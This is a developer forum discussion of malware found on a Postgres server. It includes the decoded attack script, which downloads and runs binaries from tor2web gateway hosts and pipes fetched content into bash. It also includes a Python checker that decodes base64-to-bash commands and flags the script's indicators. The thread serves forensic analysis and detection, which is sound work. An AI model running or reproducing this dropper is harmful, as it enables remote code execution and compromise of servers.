DEV Community

Discussion on: Investigation into Postgres malware (hack?)

Daniel Waller (he/him) • Edited

Hey!
Have you looked at the base64 encoded payload at all?

The long string that is being echoed is piped into base64 -d which decodes the base64 and the result is piped into bash for execution.

The decoded payload that is piped into bash is the following script:

To correctly assess your situation and the impact this might have had on your systems and users, you should definitely take a look to see what effects this script might have had on your server and data.
A very nice tool for this kind of forensic work is GCHQ's CyberChef. It has lots of functions for encoding and decoding different formats.

sanchitsharma

Thanks Daniel. Don't know why I missed the piping into the base64 -d command. I had never seen that command, so my brain missed it :D. This has become more interesting. I am looking into what this script is doing.

Daniel Waller (he/him) • Edited

Nice! Hope it's nothing too serious.
I'm also using this corona isolation time to analyze a phishing attempt against me that took place a few weeks ago.
Guess I'll be having a series of articles up over the next days :D

Valts Liepiņš

For anyone else interested, here is the malicious script after base64 decode and some tidying up:

exec &>/dev/null    # silence all stdout/stderr for the rest of the script

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

t=tencentxjy5kpccv    # hostname label prepended to every gateway domain below

# home directory of the user the script runs as (looked up in /etc/passwd)
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

# probe for a directory where a file can be written and executed; stop at the first that works
for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do
  echo exit > $i/i && \
    chmod +x $i/i && \
    cd $i && \
    ./i && \
    rm -f i && \
    break;
done

# x HOST: download HOST/int to a random-looking filename, run it, delete it
# (certificate checks are disabled for both wget and curl)
x() {
  f=/int
  d=./$(date|md5sum|cut -f1 -d-)
  wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || \
    curl -m99 -fsSLkA- $1$f -o$d
  chmod +x $d;$d;rm -f $d
}

# u HOST: fetch HOST/crn and print it to stdout (consumed by the `| bash` at the end)
u() {
  x=/crn
  wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || \
    curl -m99 -fsSLkA- $1$x
}

# /tmp/.X11-unix/00 holds the PID of an already running copy; while none is alive,
# try each tor2web gateway in turn to fetch and run the binary
for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
  if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
    x tencentxjy5kpccv.$h
  else
    break
  fi
done

# if still nothing is running, fetch /crn from the first reachable gateway and pipe it into bash
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
  (
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.tor2web.io ||
    u $t.tor2web.to ||
    u $t.onion.to ||
    u $t.onion.in.net ||
    u $t.4tor.ml ||
    u $t.onion.glass ||
    u $t.civiclink.network ||
    u $t.tor2web.su ||
    u $t.onion.ly ||
    u $t.onion.pet ||
    u $t.onion.ws
  )|bash
fi
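As an added defender-side example (not from the thread or its author), here is a small Python checker that pulls `echo <base64> | base64 -d | bash` commands out of a log or command dump, decodes them, and flags the traits of the script above: tor2web gateway domains, the /tmp/.X11-unix/00 pid marker, downloaders with certificate checks disabled, and content piped into bash. The log line format is a constructed assumption; the indicators come from the decoded script.

```python
import base64
import re

# Indicators lifted from the decoded script posted above (defender-side check)
TOR2WEB_GATEWAYS = ("d2web.org", "onion.mn", "tor2web.io", "tor2web.to", "onion.to",
                    "onion.in.net", "4tor.ml", "onion.glass", "civiclink.network",
                    "tor2web.su", "onion.ly", "onion.pet", "onion.ws")

INDICATORS = {
    "silences all output": re.compile(r"exec\s+&>\s*/dev/null"),
    "writes to world-writable dir": re.compile(r"/(?:tmp|var/tmp|dev/shm)\b"),
    "downloader with cert checks disabled": re.compile(r"--no-check-certificate|curl\b[^\n|]*-[A-Za-z]*k"),
    "remote content piped to bash": re.compile(r"\|\s*bash\b"),
    "pid marker /tmp/.X11-unix/00": re.compile(r"/tmp/\.X11-unix/00"),
    "tor2web gateway": re.compile("|".join(re.escape(g) for g in TOR2WEB_GATEWAYS)),
}

# `echo <base64> | base64 -d | bash`, the shape the original post describes
B64_PIPE = re.compile(r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]{40,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")

def extract_payloads(text):
    """Decode every base64 blob that is piped into a shell in `text`."""
    found = []
    for m in B64_PIPE.finditer(text):
        try:
            found.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:      # not valid base64 after all, skip it
            continue
    return found

def scan_payload(script):
    """Names of the indicators present in a decoded script, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))

def scan_log(text):
    """(decoded payload, matched indicators) for each blob found in a log or command dump."""
    return [(p, scan_payload(p)) for p in extract_payloads(text)]

# Constructed sample: a few lines from the script above, wrapped the way the attacker ran it.
SAMPLE_PAYLOAD = """exec &>/dev/null
t=tencentxjy5kpccv
for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do echo exit > $i/i; done
wget -t1 -T99 -qU- --no-check-certificate $1/int -O$d || curl -m99 -fsSLkA- $1/int -o$d
ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io
(u $t.tor2web.io || u $t.onion.ws)|bash
"""
SAMPLE_LOG = ("[constructed log line] echo "
              + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + " | base64 -d | bash\n")
```

Run `scan_log` over the relevant Postgres or shell history lines and review each decoded payload by hand; the indicator names only tell you where to look first.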
sanchitsharma

Thanks Valts, I have added a lightly commented (whatever I could understand) version to the post itself. Please comment if I might have done anything wrong there.